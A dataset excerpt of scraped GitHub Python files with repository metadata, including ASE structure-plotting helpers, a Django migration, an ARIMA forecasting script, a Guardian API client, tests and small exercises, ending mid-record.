| column | type |
|---|---|
| blob_id | string (length 40) |
| directory_id | string (length 40) |
| path | string (length 2–616) |
| content_id | string (length 40) |
| detected_licenses | list (length 0–69) |
| license_type | string (2 classes) |
| repo_name | string (length 5–118) |
| snapshot_id | string (length 40) |
| revision_id | string (length 40) |
| branch_name | string (length 4–63) |
| visit_date | timestamp[us] |
| revision_date | timestamp[us] |
| committer_date | timestamp[us] |
| github_id | int64 (2.91k–686M, nullable) |
| star_events_count | int64 (0–209k) |
| fork_events_count | int64 (0–110k) |
| gha_license_id | string (23 classes) |
| gha_event_created_at | timestamp[us] |
| gha_created_at | timestamp[us] |
| gha_language | string (220 classes) |
| src_encoding | string (30 classes) |
| language | string (1 class) |
| is_vendor | bool (2 classes) |
| is_generated | bool (2 classes) |
| length_bytes | int64 (2–10.3M) |
| extension | string (257 classes) |
| content | string (length 2–10.3M) |
| authors | list (length 1) |
| author_id | string (length 0–212) |
334772388d96c3e0ad4ac2d3e821f92425e6ed27
|
8cbd6648596a78a6ab62bf2201eb7a93d608c59a
|
/visualization.py
|
81e4019b045bf9351e4509748dc31a8c599afd95
|
[] |
no_license
|
chengeaa/researchscripts
|
a1a1a6f6af900bca3cd8fdf68585d14dce88e8e2
|
f677b1c515e4406dcf1b046f11b704b64d0dc2ce
|
refs/heads/master
| 2022-05-16T23:59:42.984438
| 2022-05-10T02:35:32
| 2022-05-10T02:35:32
| 196,303,412
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,198
|
py
|
#imports
#base
import os
import re
#ase
from ase.io import vasp, gen
from ase.visualize.plot import plot_atoms
from ase.visualize import view
#scipy
import pandas as pd
import numpy as np
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
#functions
def show_atoms_grid(data, rotation = '-0x,0y,0z', save= False, filename = 'grid_configs'):
'''
data is a list of ASE Atoms objects
'''
dim = int(np.ceil(np.sqrt(len(data))))
fig, axarr = plt.subplots(dim, dim, figsize=(25, 25))
for i, config in enumerate(data):
plot_atoms(config, axarr[i%dim,i//dim], rotation = rotation)
if save:
fig.savefig(filename + ".png")
def viewStructs(name, directory, kind = 'gen'):
"""
View collection of structures as a "trajectory"
Args:
- name (str): substring unique to structures (.gen, POSCAR, slab, etc)
- directory (str): Directory where the structures live
- kind: kind of output, from (vasp, gen)
Opens viewer with loaded trajectory (if remote, need X server)
"""
geometries = []
files = os.listdir(directory)
if kind == 'gen':
pattern = r"{}.*.gen".format(name)
elif kind == 'vasp':
pattern = r"{}".format(name)
else:
raise ValueError("file kind must be from (vasp, gen)")
for i in files:
key = re.search(pattern, i)
if key:
if kind == 'gen':
geometries += [gen.read_gen(directory + i)]
elif kind == 'vasp':
geometries += [vasp.read_vasp(directory + i)]
else:
raise ValueError("file kind must be from (vasp, gen)")
view(geometries)
def plotElemDist(data, targetElem = "C", latticeElems = ["Si", "N", "H"], nbins = 25, stacked = False):
"""
Plot distribution of element within slab; data should be an arraylike collection of structures
"""
targetZs = []
latticeZs = []
# populate targetZs and latticeZs with z coordinates for histogramming
for key, value in data.iteritems():
targetZs += [atom.position[2] for atom in value if atom.symbol == targetElem]
latticeZs += [atom.position[2] for atom in value if atom.symbol in latticeElems]
minZ, maxZ = np.min(latticeZs), np.max(latticeZs)
bins = np.linspace(minZ, maxZ, nbins)
width = (maxZ-minZ)/nbins
if stacked:
h = plt.hist([targetZs, latticeZs], bins = bins, density = True, alpha = 1,
label = "stacked {} and {} distributions".format(targetElem, latticeElems), stacked = True)
plt.vlines([minZ, maxZ], 0, np.max(h[:1]), label = "min and max Z positions")
else:
h1 = plt.hist(targetZs, bins = bins, density = True, alpha = 0.8,
label = "{} distribution".format(targetElem))
h2 = plt.hist(latticeZs, bins = bins, density = True, alpha = 0.2,
label = "{} distribution".format(latticeElems))
plt.vlines([minZ, maxZ], 0, np.max([h1[:1], h2[:1]]), label = "min and max Z positions")
plt.legend()
plt.show()
def getabBondcountStructure(data, idx, element):
"""
Gets a structure with 'charges' equal to nbonds between a (fixed) and b (``element``)
data needs geom, coordlabels, and (optionally) wantedIndices columns
geom is Atoms object of structure
coordlabels is a raw output from the coordlabeller function (relcoords and raw bonds)
element is desired secondary element (primary element determined by input)
Calls view() on resulting geometry
Returns the structure
"""
coordlabels = data.loc[idx, 'coordlabels']
geometry = data.loc[idx, 'geom']
if 'wantedIndices' in data:
indices = data.loc[idx, 'wantedIndices']
else:
indices = np.arange(len(geometry))
bondcounts = {key: np.sum(
np.array([geometry[i].symbol for i in value]) == element
) for key, value in
pd.Series(coordlabels[1])[indices].items()
}
charges = [0] * len(geometry)
for i in range(len(charges)):
charges[i] = bondcounts.get(i, -1)
geometry.set_initial_charges(charges)
view(geometry)
return geometry
|
[
"ckaiwen2@hotmail.com"
] |
ckaiwen2@hotmail.com
|
5edb0c8e55ee71407031f5baea3676bd34bf5368
|
28ae42f6a83fd7c56b2bf51e59250a31e68917ca
|
/tracpro/polls/migrations/0015_issue_region.py
|
ff1c2937af89c2c8ce646673002fd58356fd1f04
|
[
"BSD-3-Clause"
] |
permissive
|
rapidpro/tracpro
|
0c68443d208cb60cbb3b2077977786f7e81ce742
|
a68a782a7ff9bb0ccee85368132d8847c280fea3
|
refs/heads/develop
| 2021-01-19T10:29:48.381533
| 2018-03-13T12:17:11
| 2018-03-13T12:17:11
| 29,589,268
| 5
| 10
|
BSD-3-Clause
| 2018-02-23T14:43:12
| 2015-01-21T12:51:24
|
Python
|
UTF-8
|
Python
| false
| false
| 575
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('groups', '0004_auto_20150123_0909'),
('polls', '0014_remove_response_is_complete'),
]
operations = [
migrations.AddField(
model_name='issue',
name='region',
field=models.ForeignKey(related_name='issues_2', to='groups.Region', help_text='Region where poll was conducted', null=True),
preserve_default=True,
),
]
|
[
"rowanseymour@gmail.com"
] |
rowanseymour@gmail.com
|
6b10d9a5295db113b96722c8b92c968c83079333
|
ef821468b081ef2a0b81bf08596a2c81e1c1ef1a
|
/Python OOP/Decorators-Exercise/Cache.py
|
3630fbd6868ddb28d50316c5fea622d51b440ae5
|
[] |
no_license
|
Ivaylo-Atanasov93/The-Learning-Process
|
71db22cd79f6d961b9852f140f4285ef7820dd80
|
354844e2c686335345f6a54b3af86b78541ed3f3
|
refs/heads/master
| 2023-03-30T20:59:34.304207
| 2021-03-29T15:23:05
| 2021-03-29T15:23:05
| 294,181,544
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
def cache(func):
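# store each call's result in wrapper.log, keyed by the argument n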
def wrapper(n):
result = func(n)
wrapper.log[n] = result
return result
wrapper.log = {}
return wrapper
@cache
def fibonacci(n):
if n < 2:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
fibonacci(3)
print(fibonacci.log)
fibonacci(4)
print(fibonacci.log)
|
[
"ivailo.atanasov93@gmail.com"
] |
ivailo.atanasov93@gmail.com
|
f999bc0811f3d15a0bf554e32cd623a97861a497
|
f9b047b25184787af88fd151f2a6226b6b342954
|
/investmentTornadoServer/server/corpora.py
|
6d0570a7cfa8308f2e0cc773ff1adf8306bb5b7b
|
[] |
no_license
|
CallMeJiaGu/TonrnadoRecomendServer
|
4bfc3dd6d6a432321f80b12d66bb424fbc1a0911
|
54bb21191b16da27c20ce64ab14762bc777e30ca
|
refs/heads/master
| 2020-03-23T19:31:43.291995
| 2019-07-04T03:04:58
| 2019-07-04T03:04:58
| 141,984,920
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,210
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Wu Yuanchao <151050012@hdu.edu.cn>
import logConfig
import logging
import os
import codecs
logger = logging.getLogger()
class CorporaWithTitle():
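# iterates a space-separated, pre-tokenized file and yields (title, tokens) for each line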
def __init__(self, cutedfile):
self.f = cutedfile
def __iter__(self):
with codecs.open(self.f, 'r', 'utf-8') as f:
for line in f:
cols = line.strip().lower().split(' ')
yield cols[0], cols[1:]
class CorporaWithoutTitle():
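# same file format as above, but yields only the token list and drops the leading title column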
def __init__(self, cuted_file):
self.f = cuted_file
def __iter__(self):
with codecs.open(self.f, 'r', 'utf-8') as f:
for line in f:
cols = line.strip().lower().split(' ')
yield cols[1:]
class CorporaCut():
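# segments a raw comma-separated corpus with the supplied cutter, yielding (title, tokens) and skipping lines that produce no tokens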
def __init__(self, rawfile, cuttor):
self.rawfile = rawfile
self.cuttor = cuttor
def __iter__(self):
with codecs.open(self.rawfile, 'r', 'utf-8') as f:
for i, line in enumerate(f):
cols = line.strip().split(',')
title, content = cols[0].strip().lower(), u' '.join(cols[1:]).lower()
tokens = self.cuttor.fltcut(content)
if len(tokens) > 0:
yield title.encode('utf8'), tokens
else:
logger.warn('line %d skipped' % i)
def process_rawcorpora(rawfile, target, cuttor):
cuted_corpora = CorporaCut(rawfile, cuttor)
with codecs.open(target, 'w', 'utf-8') as f:
for title, tokens in cuted_corpora:
try:
f.write(title + ' ' + u' '.join(tokens) + os.linesep)
except Exception as e:
logger.error((title, tokens, e))
def load_words(dirname):
words = set()
for fname in os.listdir(dirname):
print('load from ' + fname)
for line in codecs.open(os.path.join(dirname, fname), 'r', 'utf-8'):
for w in set(line.strip().split()):
words.add(w)
return words
if __name__ == '__main__':
from mycut import FilterCut
cuttor = FilterCut()
r = './test/raw/paper_error.txt'
t = './test/cut/test.txt'
process_rawcorpora(r, t, cuttor)
|
[
"646696382@qq.com"
] |
646696382@qq.com
|
b8fac3e471ae450389961aa1cb49b4834ce1d6cb
|
5b565e331073a8b29f997c30b58d383806f7d5a8
|
/pizzeria/11_env/bin/easy_install-3.7
|
242566d7d779997c369a8ea2a01c7db939a5250b
|
[] |
no_license
|
jeongwook/python_work
|
f403d5be9da6744e49dd7aedeb666a64047b248d
|
bba188f47e464060d5c3cd1f245d367da37827ec
|
refs/heads/master
| 2022-04-02T23:16:57.597664
| 2020-01-21T08:29:48
| 2020-01-21T08:29:48
| 227,506,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 288
|
7
|
#!/Users/jeongwook/Desktop/python/python_work/pizzeria/11_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jeongwook.yu@utexas.edu"
] |
jeongwook.yu@utexas.edu
|
d7ce13d83dd278c415907caea2967729f60ed941
|
78a8c8a60b9ebb6c5e01528253971f8464acdc27
|
/python/problem79.py
|
be165c1f7339f7177c38ab3d2d5c3cc45a096b0d
|
[] |
no_license
|
hakver29/project_euler
|
f1b2d19f0bf2c6b842256f961845424cd2dc696f
|
ab356a32d706759531cad7a1a6586534ff92c142
|
refs/heads/master
| 2021-06-03T13:39:22.758018
| 2020-12-01T23:42:35
| 2020-12-01T23:42:35
| 70,273,535
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 559
|
py
|
import pandas as pd
import os
path = './p079_keylog.txt'
data = pd.read_csv(path, header=None)
print(data)
# First letter: [1,3,6,7]
# Only 7 is always first: 7
# Second letter: [1,2,3,6]
# 3 before 1
# 3 before 6
# 3 before 2
# Second letter: 3
# Third letter: [0, 1,2,6,7,8,9]
# 1 before 9 2 8 6 0
# Third letter: 1
# Fourth letter: [0,2,6,8,9]
# 6 before 0,2,8,9
# Fourth letter: 6
# Fifth letter: [0,2,8,9]
# 8 before 0
# 9 before 0
# 8 before 9
# 2 before 9
# 2 before 8
# Fifth letter: 2
# Sixth letter: [0,8,9]
# Remaining: 890
# Answer: 73162890
|
[
"haakongv@stud.ntnu.no"
] |
haakongv@stud.ntnu.no
|
dedc1e2d4474ac95a338056cb6ee689645ed4e0c
|
3607629e732c37f40231fe4c83e73ac087ed3fcf
|
/poc-todo/POC/APP/Task/migrations/0004_remove_usertasks_first_name.py
|
08ca53373c7ef5acfe15379664dd64b1b080bddd
|
[] |
no_license
|
gout-tech/apis_cusat_connect
|
3d71f73a620b7fa489671f45cbce7cc7b6972f80
|
fd7114480592e81ead6e2efe932504629c2ff696
|
refs/heads/master
| 2022-05-29T14:10:10.326086
| 2020-02-25T04:18:38
| 2020-02-25T04:18:38
| 242,907,961
| 0
| 0
| null | 2022-04-22T23:06:17
| 2020-02-25T04:17:32
|
Python
|
UTF-8
|
Python
| false
| false
| 334
|
py
|
# Generated by Django 2.2.1 on 2019-08-12 13:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Task', '0003_usertasks_first_name'),
]
operations = [
migrations.RemoveField(
model_name='usertasks',
name='first_name',
),
]
|
[
"goutham.hashrot@gmail.com"
] |
goutham.hashrot@gmail.com
|
9152ac03f49d6c145510fb642b234cac13c0b135
|
23e0f2433ae89295766a24d8d87626d18af6e84c
|
/problems/abc179_a.py
|
78c1867f75ae21403e67d3de6f63c06edac7d487
|
[] |
no_license
|
chokoryu/atcoder
|
0d7ec486177e45abee847acde38d31d35c61df42
|
e0c0920a7a4d8a90fd6fb3cab7ab1e97a95b9084
|
refs/heads/master
| 2023-02-06T12:06:09.562394
| 2020-12-29T02:42:54
| 2020-12-29T02:42:54
| 283,260,970
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 460
|
py
|
from fractions import gcd
from collections import Counter, deque, defaultdict
from heapq import heappush, heappop, heappushpop, heapify, heapreplace, merge
from bisect import bisect_left, bisect_right, bisect, insort_left, insort_right, insort
from itertools import accumulate, product, permutations, combinations
def main():
S = input()
if S[-1] == 's':
print(S + 'es')
else:
print(S + 's')
if __name__ == '__main__':
main()
|
[
"chokoryu@gmail.com"
] |
chokoryu@gmail.com
|
70a9392a3f153d8f770b23044ec2533f41dc3a2f
|
c4e3f8ba5ddadcdb8f6cd818623745951318a8d9
|
/Arima_smape.py
|
b092a690a460877f73ec5cbcae499a9f165f3076
|
[] |
no_license
|
wangningjun/ARIMA_time_serise
|
8a70e55a14399d1bb435180656ab2e0336224248
|
8eb526feac394e4043be7467b1407b80095e3df4
|
refs/heads/master
| 2020-03-26T13:59:12.343731
| 2018-10-12T03:08:30
| 2018-10-12T03:08:30
| 144,965,956
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,201
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pylab as plt
from statsmodels.tsa.arima_model import ARIMA
import os
from pandas.core.frame import DataFrame
from sys import maxsize
'''
Last updated: 2018/8/28
Description: this script forecasts a time series with the ARIMA algorithm.
Update note: dynamic (p, q) parameter selection is implemented;
the next n time steps are predicted and the SMAPE is computed.
'''
def difference(dataset, interval=1):
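# seasonal differencing: each value minus the value `interval` steps earlier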
diff = list()
for i in range(interval, len(dataset)):
value = dataset[i] - dataset[i - interval]
diff.append(value)
return np.array(diff)
# invert differenced value
def inverse_difference(history, yhat, interval=1):
return yhat + history[-interval]
def Arima_up(x):
differenced = difference(x, days_up)
_, p, q, _ = proper_model(differenced,3)
print(p,q)
model = ARIMA(differenced, order=(p, 0, q))
ARIMA_model = model.fit(disp=0)
return ARIMA_model
def Arima_down(x):
differenced = difference(x, days_down)
_,p,q,_ = proper_model(differenced,3)
print(p,q)
model = ARIMA(differenced, order=(p, 0, q))
ARIMA_model = model.fit(disp=0)
return ARIMA_model
def predict(X,model,days):
# within the training period, predict and fittedvalues give identical results; the difference is that predict can forecast beyond it
differenced = difference(X, days)
start_index = len(differenced)
end_index = len(differenced) + predict_long
forecast = model.predict(start=int(start_index), end=int(end_index))
history = [x for x in X]
# plt.plot(history, color='red', label='predict_data')
for yhat in forecast:
inverted = inverse_difference(history, yhat, days)
if inverted<0: # set any predicted value below 0 to 0
inverted = 0
history.append(inverted)
return history
def show(predict,realy):
plt.figure(figsize=(8, 4))
plt.subplot(2, 1, 1)
plt.plot(predict, color='red', label='predict')
plt.subplot(2, 1, 2)
plt.plot(realy, color='red', label='realy')
plt.show()
def show_double(predict,realy):
plt.figure(figsize=(8, 4))
plt.subplot(2, 1, 1)
plt.plot(predict, color='red', label='predict')
plt.subplot(2, 1, 2)
plt.plot(realy, color='blue', label='realy')
plt.show()
def proper_model(data_ts, maxLag):
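# grid-search (p, q) up to maxLag and keep the ARIMA(p, 0, q) fit with the lowest BIC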
init_bic = maxsize
init_p = 0
init_q = 0
init_properModel = None
for p in np.arange(maxLag):
for q in np.arange(maxLag):
model = ARIMA(data_ts, order=(p,0,q))
try:
results_ARIMA = model.fit(disp=-1)
except:
continue
bic = results_ARIMA.bic
if bic < init_bic:
init_p = p
init_q = q
init_properModel = results_ARIMA
init_bic = bic
return init_bic, init_p, init_q, init_properModel
'''
if __name__ == '__main__':
days_up = 24
days_down = 24
predict_long = 29
path_in = 'data/in/outdata/' # folder path
path_out = 'data/out/'
count = 0
for file in os.listdir(path_in):
df = open(path_in + file, 'rb') # file
data = pd.read_csv(df, header=None)
data.columns = ['time', 'up', 'down']
# data = pd.read_csv(df) # for files with a header row
len_data = len(data)
data_ = data.head(len_data-(predict_long+1)) # keep everything except the last thirty rows
if len(data_) < predict_long:
continue
X1 = data_['up']
X2 = data_['down']
try:
model_up = Arima_up(X1)
except:
continue
# try:
# model_down = Arima_down(X2)
# except:
# continue
results_pre_up = predict(X1, model_up, days_up)
# results_pre_down = predict(X2, model_down, days_down)
count += 1
real_up = data['up'].tail(predict_long+1)
real_down = data['down'].tail(predict_long+1)
pre_up_long = np.array(results_pre_up[-(predict_long+1):])
show(pre_up_long, real_up) # plot the predicted thirty days against the real thirty days
smape_up = sum(abs( pre_up_long- real_up.values)/(pre_up_long+real_up.values))/(predict_long+1)*2
# smape_down = sum(abs(results_pre_down-real_down.values)/(results_pre_down+real_down.values))/len(results_pre_down)*2
print(smape_up)
'''
if __name__ == '__main__':
days_up = 24
days_down = 24
predict_long = 29
path_in = 'data/in/data/' # folder path
path_out = 'data/out/'
for file in os.listdir(path_in):
df = open(path_in + file, 'rb') # file
# data = pd.read_csv(df, header=None)
# data.columns = ['time', 'up', 'down']
data = pd.read_csv(df) # the file has a header row
real_up = data['down'][-days_down*2:-days_down]
pre_up = data['down'].tail(days_up)
show(real_up, pre_up) # plot the predicted 24 days against the real 24 days
real_up = real_up.values
pre_up = np.array(pre_up.values)
smape_up = sum(abs(real_up- pre_up)/(real_up+pre_up))/(days_up)*2
print(smape_up)
# smape_down = sum(abs(results_pre_down-real_down.values)/(results_pre_down+real_down.values))/len(results_pre_down)*2
|
[
"ningjun_wang@163.com"
] |
ningjun_wang@163.com
|
7d75a5e69d0aeff702d6fe53686e32f47cd01b4e
|
f1614f3531701a29a33d90c31ab9dd6211c60c6b
|
/test/menu_sun_integration/handlers/test_status_synchronizer_service.py
|
207c451856241312424ce76fdbb72a3f98062b7d
|
[] |
no_license
|
pfpacheco/menu-sun-api
|
8a1e11543b65db91d606b2f3098847e3cc5f2092
|
9bf2885f219b8f75d39e26fd61bebcaddcd2528b
|
refs/heads/master
| 2022-12-29T13:59:11.644409
| 2020-10-16T03:41:54
| 2020-10-16T03:41:54
| 304,511,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,110
|
py
|
import json
import os
import responses
import pytest
from menu_sun_api.domain.model.customer.customer import Customer
from menu_sun_api.domain.model.order.order import OrderStatusType
from menu_sun_api.domain.model.order.order_repository import OrderRepository
from menu_sun_api.domain.model.seller.seller import IntegrationType
from menu_sun_integration.application.services.order_integration_service import OrderIntegrationService
from promax.application.status_synchronizer_service import StatusSynchronizerService
from test.menu_sun_api.db.order_factory import OrderFactory, OrderStatusFactory
from test.menu_sun_api.db.seller_factory import SellerFactory
from test.menu_sun_api.integration_test import IntegrationTest
here = os.path.dirname(os.path.realpath(__file__))
def bind_seller(integration_type):
return SellerFactory.create(seller_code='0810204', integration_type=integration_type)
class TestStatusNotifierService(IntegrationTest):
@pytest.fixture
def active_responses(self):
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/authenticate_user_response.json'))
response = json.load(json_file)
responses.add(responses.POST, 'https://{}/ambev/security/ldap/authenticateUser'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
return responses
@responses.activate
def test_fetch_order_status_promax(self, session, active_responses):
seller = bind_seller(IntegrationType.PROMAX)
session.commit()
customer = Customer(document="17252508000180", seller_id=seller.id)
statuses = [OrderStatusFactory(status=OrderStatusType.NEW),
OrderStatusFactory(status=OrderStatusType.APPROVED)]
order = OrderFactory.create(seller_id=seller.id, order_id='M2100008658',
customer=customer, statuses=statuses)
session.commit()
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/orders_history_response.json'))
response = json.load(json_file)
active_responses.add(responses.POST,
'https://{}/ambev/genericRestEndpoint'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
order_repository = OrderRepository(session=session)
integration_service = OrderIntegrationService(session=session)
status_notification = StatusSynchronizerService(order_repository=order_repository,
integration_service=integration_service)
status_notification.sync_all_pending_orders(
seller_id=seller.id, seller_code=seller.seller_code, integration_type=seller.integration_type)
session.commit()
order = order_repository.get_order(
seller_id=seller.id, order_id=order.order_id)
assert (order.status.status == OrderStatusType.CANCELED)
|
[
"pfpacheco@gmail.com"
] |
pfpacheco@gmail.com
|
811d4c6beed89125664d5495f5675efc4f51e2f2
|
3d18dbe77b052754e2a7a9bbaee9650a9fb410e2
|
/test/11-ignore-design-docs.py
|
ea7165e3f5b58d5a27a8d4f9da83c47858fcd920
|
[
"Apache-2.0"
] |
permissive
|
apache/couchdb-mango
|
765ebceec2912acb9696fadf9ec8f3d244d604c6
|
312e2c45535913c190cdef51f6ea65066ccd89dc
|
refs/heads/master
| 2023-07-02T18:36:31.552696
| 2017-02-07T16:40:09
| 2017-03-31T17:25:17
| 30,287,956
| 39
| 23
|
Apache-2.0
| 2023-01-18T14:24:00
| 2015-02-04T08:00:05
|
Erlang
|
UTF-8
|
Python
| false
| false
| 1,106
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import mango
import unittest
DOCS = [
{
"_id": "_design/my-design-doc",
},
{
"_id": "54af50626de419f5109c962f",
"user_id": 0,
"age": 10,
"name": "Jimi"
},
{
"_id": "54af50622071121b25402dc3",
"user_id": 1,
"age": 11,
"name": "Eddie"
}
]
class IgnoreDesignDocsForAllDocsIndexTests(mango.DbPerClass):
def test_should_not_return_design_docs(self):
self.db.save_docs(DOCS)
docs = self.db.find({"_id": {"$gte": None}})
assert len(docs) == 2
|
[
"garren.smith@gmail.com"
] |
garren.smith@gmail.com
|
faf55dcced2172399d37e25d66e39d89868333d0
|
280049c5d363df840e5a2184002e59625f0af61b
|
/datastructure11-balancedparanthesischeck.py
|
26c752c9dfffff64c23a2cf8d5095ae37812d617
|
[] |
no_license
|
deesaw/DataSPython
|
853c1b36f7185752613d6038e706b06fbf25c84e
|
c69a23dff3b3852310f145d1051f2ad1dda6b7b5
|
refs/heads/main
| 2023-02-19T13:36:01.547293
| 2021-01-16T13:15:56
| 2021-01-16T13:15:56
| 330,166,053
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 12:17:58 2021
@author: deesaw
"""
def balance_check(s):
# Check is even number of brackets
if len(s)%2 != 0:
return False
# Set of opening brackets
opening = set('([{')
# Matching Pairs
matches = set([ ('(',')'), ('[',']'), ('{','}') ])
# Use a list as a "Stack"
stack = []
# Check every parenthesis in string
for paren in s:
# If its an opening, append it to list
if paren in opening:
stack.append(paren)
else:
# Check that there are parentheses in Stack
if len(stack) == 0:
return False
# Check the last open parenthesis
last_open = stack.pop()
# Check if it has a closing match
if (last_open,paren) not in matches:
return False
return len(stack) == 0
from nose.tools import assert_equal
class TestBalanceCheck(object):
def test(self,sol):
assert_equal(sol('[](){([[[]]])}('),False)
assert_equal(sol('[{{{(())}}}]((()))'),True)
assert_equal(sol('[[[]])]'),False)
print('ALL TEST CASES PASSED')
# Run Tests
t = TestBalanceCheck()
t.test(balance_check)
|
[
"69420960+deesaw@users.noreply.github.com"
] |
69420960+deesaw@users.noreply.github.com
|
adec15e7f10d62c6d1a6c1bca83ce174883b2551
|
69f47a6e77fc2a1363fc8713ed83d36209e7cf32
|
/deframed/default.py
|
997b289bd34920ff3704dc3d241fa7fbc6f6c50e
|
[] |
no_license
|
smurfix/deframed
|
f1c4611c597809b53a138b70665430ed080a989d
|
9c1d4db2991cef55725ac6ecae44af60a96ff4f2
|
refs/heads/master
| 2022-07-20T14:08:35.938667
| 2022-07-14T07:05:43
| 2022-07-14T07:05:43
| 259,882,446
| 24
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,184
|
py
|
"""
This module contains the default values for configuring DeFramed.
"""
from .util import attrdict
__all__ = ["CFG"]
CFG = attrdict(
logging=attrdict( # a magic incantation
version=1,
loggers=attrdict(
#"asyncari": {"level":"INFO"},
),
root=attrdict(
handlers= ["stderr",],
level="INFO",
),
handlers=attrdict(
logfile={
"class":"logging.FileHandler",
"filename":"/var/log/deframed.log",
"level":"INFO",
"formatter":"std",
},
stderr={
"class":"logging.StreamHandler",
"level":"INFO",
"formatter":"std",
"stream":"ext://sys.stderr",
},
),
formatters=attrdict(
std={
"class":"deframed.util.TimeOnlyFormatter",
"format":'%(asctime)s %(levelname)s:%(name)s:%(message)s',
},
),
disable_existing_loggers=False,
),
server=attrdict( # used to setup the hypercorn toy server
host="127.0.0.1",
port=8080,
prio=0,
name="test me",
use_reloader=False,
ca_certs=None,
certfile=None,
keyfile=None,
),
mainpage="templates/layout.mustache",
debug=False,
data=attrdict( # passed to main template
title="Test page. Do not test!",
loc=attrdict(
#msgpack="https://github.com/ygoe/msgpack.js/raw/master/msgpack.min.js",
#mustache="https://github.com/janl/mustache.js/raw/master/mustache.min.js",
msgpack="https://unpkg.com/@msgpack/msgpack",
mustache="/static/ext/mustache.min.js",
bootstrap_css="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css",
bootstrap_js="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js",
poppler="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js",
jquery="https://code.jquery.com/jquery-3.4.1.slim.min.js",
),
static="static", # path
),
)
|
[
"matthias@urlichs.de"
] |
matthias@urlichs.de
|
22aa2617e351bbbaf035cb3b8ac08016c4632660
|
41278a3ab6c8b8f280e785b79c15377a2de56a2d
|
/guardian.py
|
680dbcc6516d80fb29ac29c6bda4d43391c6e140
|
[] |
no_license
|
mayanand/restClient
|
1f0c70aad91d15c1a8d7f53bdc5c5c89ab6e5db8
|
927cffc1f2374760633da4bf6555801a80983469
|
refs/heads/master
| 2021-03-08T19:25:38.925946
| 2016-04-14T00:04:46
| 2016-04-14T00:04:46
| 56,193,486
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 721
|
py
|
#!/usr/bin/env python
from restapi import restAPI
from image import imageDownloader
class guardianRestAPI(restAPI):
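# REST client for the Guardian content search API; downloads images from each search result's webUrl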
def __init__(self):
restAPI.__init__(self)
self.RESTendpoint = "http://content.guardianapis.com/search?q=%s&api-key=%s"
self.apiKey = 'test'
def parseGuradianJSON(self, topic):
result = self.connect_api(topic)
imageDownloader_obj = imageDownloader()
for element in result['response']['results']:
imageDownloader_obj.get_images(element['webUrl'])
#pprint.pprint(result)
if __name__ == '__main__':
g_obj = guardianRestAPI()
g_obj.parseGuradianJSON('obama')
|
[
"Mayank Anand"
] |
Mayank Anand
|
61c547985ebd1624cef39b0279164ca64369bd8b
|
54a2ac1972aa12e97e1029dddac6908a0e457d1c
|
/ej22.py
|
d564606a9f466aa3698b9b3467e6bba2ad18706d
|
[] |
no_license
|
bthecs/computacion-2
|
2e7b557ab365e74634772f58067b2bbe0ea5d1d3
|
69d54714da8f40fbef9a6635b4fe6b1b1638a11e
|
refs/heads/master
| 2023-03-18T22:38:21.953987
| 2019-12-11T15:42:25
| 2019-12-11T15:42:25
| 343,834,502
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from multiprocessing import Queue, Lock
import threading
import time
import os
def thread_function(x,l,q):
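# each worker grabs the lock, sleeps a second, and pushes its PID, thread name/id and index onto the shared queue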
l.acquire()
time.sleep(1)
q.put("mi PID es: %d,Nombre: %s, Thread %d,Proceso: %d"%(os.getpid(),threading.current_thread().getName(),threading.get_ident(),x))
l.release()
def mostrarCola(q):
while True:
print(q.get())
if q.empty():
break
if __name__ == "__main__":
q = Queue()
l = Lock()
pid=os.getpid()
for x in range(3):
p1 = threading.Thread(target=thread_function, args=(x,l,q))
p1.start()
time.sleep(1)
p1.join()
mostrarCola(q)
|
[
"fl.gimenez@alumno.um.edu.ar"
] |
fl.gimenez@alumno.um.edu.ar
|
e2165c7579217230237b68c6b491e3e20486e06b
|
c4ea97ae471cd222378684b8dc6be1047836dc85
|
/src/dedt/dedalusParser.py
|
9ba5de3d8b1778559ec87925a329aaff254cb7aa
|
[
"MIT"
] |
permissive
|
KDahlgren/iapyx
|
b3de26da34ffd7dcc255afd9b70fe58de543711b
|
260a265f79cd66bf4ea72b0a4837517d460dc257
|
refs/heads/master
| 2018-10-01T06:45:15.986558
| 2018-06-22T01:38:22
| 2018-06-22T01:38:22
